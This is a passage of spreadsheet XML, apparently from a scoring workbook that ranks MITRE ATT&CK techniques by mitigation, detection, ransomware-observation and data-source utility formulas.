        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>53.29999153968253</v>
      </c>
      <c r="AR137" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS137" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT137" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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38" spans="1:47" ht="17">
      <c r="A138" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B138" s="37">
        <f t="shared" si="2"/>
        <v>125.3</v>
      </c>
      <c r="C138" s="37" t="s">
        <v>504</v>
      </c>
      <c r="D138" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E138" s="37" t="s">
        <v>505</v>
      </c>
      <c r="F138" s="37">
        <v>1</v>
      </c>
      <c r="G138" s="37">
        <v>1</v>
      </c>
      <c r="H138" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I138" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J138" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K138" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L138" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M138" s="37">
        <v>0</v>
      </c>
      <c r="N138" s="56">
        <v>0</v>
      </c>
      <c r="O138" s="56">
        <v>12</v>
      </c>
      <c r="P138" s="56">
        <v>4</v>
      </c>
      <c r="Q138" s="56">
        <v>12</v>
      </c>
      <c r="R138" s="57"/>
      <c r="S138" s="57">
        <v>0</v>
      </c>
      <c r="T138" s="57"/>
      <c r="U138" s="57">
        <v>0</v>
      </c>
      <c r="V138" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W138" s="37">
        <v>0</v>
      </c>
      <c r="X138" s="37">
        <v>0</v>
      </c>
      <c r="Y138" s="37">
        <v>0</v>
      </c>
      <c r="Z138" s="37">
        <v>28</v>
      </c>
      <c r="AA138" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AB138" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AC138" s="37"/>
      <c r="AD138" s="50" t="s">
        <v>506</v>
      </c>
      <c r="AE138" s="37" t="str" cm="1">
        <f t="array" ref="AE138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD138)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF138" s="37">
        <v>134</v>
      </c>
      <c r="AG138" s="37" t="str" cm="1">
        <f t="array" ref="AG138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD138)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH138" s="37">
        <v>134</v>
      </c>
      <c r="AI138" s="37" t="str" cm="1">
        <f t="array" ref="AI138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD138)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ138" s="37">
        <v>134</v>
      </c>
      <c r="AK138" s="37" t="str" cm="1">
        <f t="array" ref="AK138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD138)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL138" s="37">
        <v>134</v>
      </c>
      <c r="AM138" s="37" t="str" cm="1">
        <f t="array" ref="AM138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD138)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN138" s="37">
        <v>0</v>
      </c>
      <c r="AO138" s="37">
        <v>5</v>
      </c>
      <c r="AP138" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ138" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>41.766666666666666</v>
      </c>
      <c r="AR138" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS138" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT138" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU13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5.0912698412698409</v>
      </c>
    </row>
    <row r="139" spans="1:47" ht="51">
      <c r="A139" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B139" s="37">
        <f t="shared" si="2"/>
        <v>66.980952380952388</v>
      </c>
      <c r="C139" s="37" t="s">
        <v>507</v>
      </c>
      <c r="D139" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E139" s="37" t="s">
        <v>508</v>
      </c>
      <c r="F139" s="37">
        <v>1</v>
      </c>
      <c r="G139" s="37">
        <v>1</v>
      </c>
      <c r="H139" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I139" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J139" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K139" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L139" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M139" s="37">
        <v>0</v>
      </c>
      <c r="N139" s="56">
        <v>1</v>
      </c>
      <c r="O139" s="56">
        <v>3</v>
      </c>
      <c r="P139" s="56">
        <v>0</v>
      </c>
      <c r="Q139" s="56">
        <v>1</v>
      </c>
      <c r="R139" s="57"/>
      <c r="S139" s="57">
        <v>0</v>
      </c>
      <c r="T139" s="57"/>
      <c r="U139" s="57">
        <v>0</v>
      </c>
      <c r="V139" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W139" s="37">
        <v>0</v>
      </c>
      <c r="X139" s="37">
        <v>0</v>
      </c>
      <c r="Y139" s="37">
        <v>0</v>
      </c>
      <c r="Z139" s="37">
        <v>5</v>
      </c>
      <c r="AA139" s="37">
        <v>0.05</v>
      </c>
      <c r="AB139" s="37">
        <v>0.05</v>
      </c>
      <c r="AC139" s="37"/>
      <c r="AD139" s="50" t="s">
        <v>509</v>
      </c>
      <c r="AE139" s="37" t="str" cm="1">
        <f t="array" ref="AE139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD139)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF139" s="37">
        <v>135</v>
      </c>
      <c r="AG139" s="37" t="str" cm="1">
        <f t="array" ref="AG139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD139)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH139" s="37">
        <v>135</v>
      </c>
      <c r="AI139" s="37" t="str" cm="1">
        <f t="array" ref="AI139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD139)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ139" s="37">
        <v>135</v>
      </c>
      <c r="AK139" s="37" t="str" cm="1">
        <f t="array" ref="AK139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD139)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL139" s="37">
        <v>135</v>
      </c>
      <c r="AM139" s="37" t="str" cm="1">
        <f t="array" ref="AM139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD139)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN139" s="37">
        <v>0</v>
      </c>
      <c r="AO139" s="37">
        <v>0</v>
      </c>
      <c r="AP139" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ139" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>22.326984126984129</v>
      </c>
      <c r="AR139" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS139" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT139" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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40" spans="1:47" ht="17">
      <c r="A140" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B140" s="37">
        <f t="shared" si="2"/>
        <v>70.071428571428569</v>
      </c>
      <c r="C140" s="37" t="s">
        <v>510</v>
      </c>
      <c r="D140" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E140" s="37" t="s">
        <v>511</v>
      </c>
      <c r="F140" s="37">
        <v>1</v>
      </c>
      <c r="G140" s="37">
        <v>1</v>
      </c>
      <c r="H140" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I140" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J140" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K140" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L140" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M140" s="37">
        <v>0</v>
      </c>
      <c r="N140" s="56">
        <v>0</v>
      </c>
      <c r="O140" s="56">
        <v>5</v>
      </c>
      <c r="P140" s="56">
        <v>1</v>
      </c>
      <c r="Q140" s="56">
        <v>0</v>
      </c>
      <c r="R140" s="57"/>
      <c r="S140" s="57">
        <v>0</v>
      </c>
      <c r="T140" s="57"/>
      <c r="U140" s="57">
        <v>0</v>
      </c>
      <c r="V140" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W140" s="37">
        <v>0</v>
      </c>
      <c r="X140" s="37">
        <v>0</v>
      </c>
      <c r="Y140" s="37">
        <v>0</v>
      </c>
      <c r="Z140" s="37">
        <v>6</v>
      </c>
      <c r="AA140" s="37">
        <v>0.06</v>
      </c>
      <c r="AB140" s="37">
        <v>0.06</v>
      </c>
      <c r="AC140" s="37"/>
      <c r="AD140" s="50" t="s">
        <v>512</v>
      </c>
      <c r="AE140" s="37" t="str" cm="1">
        <f t="array" ref="AE140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF140" s="37">
        <v>136</v>
      </c>
      <c r="AG140" s="37" t="str" cm="1">
        <f t="array" ref="AG140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH140" s="37">
        <v>136</v>
      </c>
      <c r="AI140" s="37" t="str" cm="1">
        <f t="array" ref="AI140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD140)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ140" s="37">
        <v>136</v>
      </c>
      <c r="AK140" s="37" t="str" cm="1">
        <f t="array" ref="AK140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL140" s="37">
        <v>136</v>
      </c>
      <c r="AM140" s="37" t="str" cm="1">
        <f t="array" ref="AM140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN140" s="37">
        <v>0</v>
      </c>
      <c r="AO140" s="37">
        <v>0</v>
      </c>
      <c r="AP140" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ140" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>23.357142857142858</v>
      </c>
      <c r="AR140" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS140" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT140" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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41" spans="1:47" ht="68">
      <c r="A141" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B141" s="37">
        <f t="shared" si="2"/>
        <v>125.48571428571429</v>
      </c>
      <c r="C141" s="37" t="s">
        <v>513</v>
      </c>
      <c r="D141" s="50" t="s">
        <v>514</v>
      </c>
      <c r="E141" s="37" t="s">
        <v>515</v>
      </c>
      <c r="F141" s="37">
        <v>1</v>
      </c>
      <c r="G141" s="37">
        <v>1</v>
      </c>
      <c r="H141" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I141" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J141" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K141" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L141" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M141" s="37">
        <v>0</v>
      </c>
      <c r="N141" s="56">
        <v>0</v>
      </c>
      <c r="O141" s="56">
        <v>6</v>
      </c>
      <c r="P141" s="56">
        <v>11</v>
      </c>
      <c r="Q141" s="56">
        <v>10</v>
      </c>
      <c r="R141" s="57"/>
      <c r="S141" s="57"/>
      <c r="T141" s="57"/>
      <c r="U141" s="57"/>
      <c r="V141" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142859</v>
      </c>
      <c r="W141" s="37">
        <v>0</v>
      </c>
      <c r="X141" s="37">
        <v>0</v>
      </c>
      <c r="Y141" s="37">
        <v>0</v>
      </c>
      <c r="Z141" s="37">
        <v>27</v>
      </c>
      <c r="AA141" s="37">
        <v>0.27</v>
      </c>
      <c r="AB141" s="37">
        <v>0.27</v>
      </c>
      <c r="AC141" s="37"/>
      <c r="AD141" s="50" t="s">
        <v>516</v>
      </c>
      <c r="AE141" s="37" t="str" cm="1">
        <f t="array" ref="AE141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD141)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF141" s="37">
        <v>137</v>
      </c>
      <c r="AG141" s="37" t="str" cm="1">
        <f t="array" ref="AG141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD141)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH141" s="37">
        <v>137</v>
      </c>
      <c r="AI141" s="37" t="str" cm="1">
        <f t="array" ref="AI141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD141)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ141" s="37">
        <v>137</v>
      </c>
      <c r="AK141" s="37" t="str" cm="1">
        <f t="array" ref="AK141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD141)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL141" s="37">
        <v>137</v>
      </c>
      <c r="AM141" s="37" t="str" cm="1">
        <f t="array" ref="AM141">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD141)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN141" s="37">
        <v>0</v>
      </c>
      <c r="AO141" s="37"/>
      <c r="AP141" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ141" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>41.828571428571429</v>
      </c>
      <c r="AR141" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS141" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT141" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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42" spans="1:47" ht="34">
      <c r="A142" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B142" s="37">
        <f t="shared" si="2"/>
        <v>144.83333333333334</v>
      </c>
      <c r="C142" s="37" t="s">
        <v>517</v>
      </c>
      <c r="D142" s="50" t="s">
        <v>514</v>
      </c>
      <c r="E142" s="37" t="s">
        <v>518</v>
      </c>
      <c r="F142" s="37">
        <v>1</v>
      </c>
      <c r="G142" s="37">
        <v>1</v>
      </c>
      <c r="H142" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I142" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J142" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K142" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L142" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M142" s="37">
        <v>0</v>
      </c>
      <c r="N142" s="56">
        <v>0</v>
      </c>
      <c r="O142" s="56">
        <v>29</v>
      </c>
      <c r="P142" s="56">
        <v>3</v>
      </c>
      <c r="Q142" s="56">
        <v>2</v>
      </c>
      <c r="R142" s="57"/>
      <c r="S142" s="57"/>
      <c r="T142" s="57"/>
      <c r="U142" s="57"/>
      <c r="V142" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W142" s="37">
        <v>0</v>
      </c>
      <c r="X142" s="37">
        <v>0</v>
      </c>
      <c r="Y142" s="37">
        <v>0</v>
      </c>
      <c r="Z142" s="37">
        <v>34</v>
      </c>
      <c r="AA142" s="37">
        <v>0.34</v>
      </c>
      <c r="AB142" s="37">
        <v>0.34</v>
      </c>
      <c r="AC142" s="37"/>
      <c r="AD142" s="50" t="s">
        <v>519</v>
      </c>
      <c r="AE142" s="37" t="str" cm="1">
        <f t="array" ref="AE142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD142)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF142" s="37">
        <v>138</v>
      </c>
      <c r="AG142" s="37" t="str" cm="1">
        <f t="array" ref="AG142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD142)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH142" s="37">
        <v>138</v>
      </c>
      <c r="AI142" s="37" t="str" cm="1">
        <f t="array" ref="AI142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD142)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ142" s="37">
        <v>138</v>
      </c>
      <c r="AK142" s="37" t="str" cm="1">
        <f t="array" ref="AK142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD142)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL142" s="37">
        <v>138</v>
      </c>
      <c r="AM142" s="37" t="str" cm="1">
        <f t="array" ref="AM142">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD142)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN142" s="37">
        <v>0</v>
      </c>
      <c r="AO142" s="37"/>
      <c r="AP142" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ142" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>48.277777777777779</v>
      </c>
      <c r="AR142" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS142" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT142" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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43" spans="1:47" ht="85">
      <c r="A143" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B143" s="37">
        <f t="shared" si="2"/>
        <v>58.352380952380955</v>
      </c>
      <c r="C143" s="37" t="s">
        <v>520</v>
      </c>
      <c r="D143" s="50" t="s">
        <v>514</v>
      </c>
      <c r="E143" s="37" t="s">
        <v>521</v>
      </c>
      <c r="F143" s="37">
        <v>1</v>
      </c>
      <c r="G143" s="37">
        <v>1</v>
      </c>
      <c r="H143" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I143" s="37">
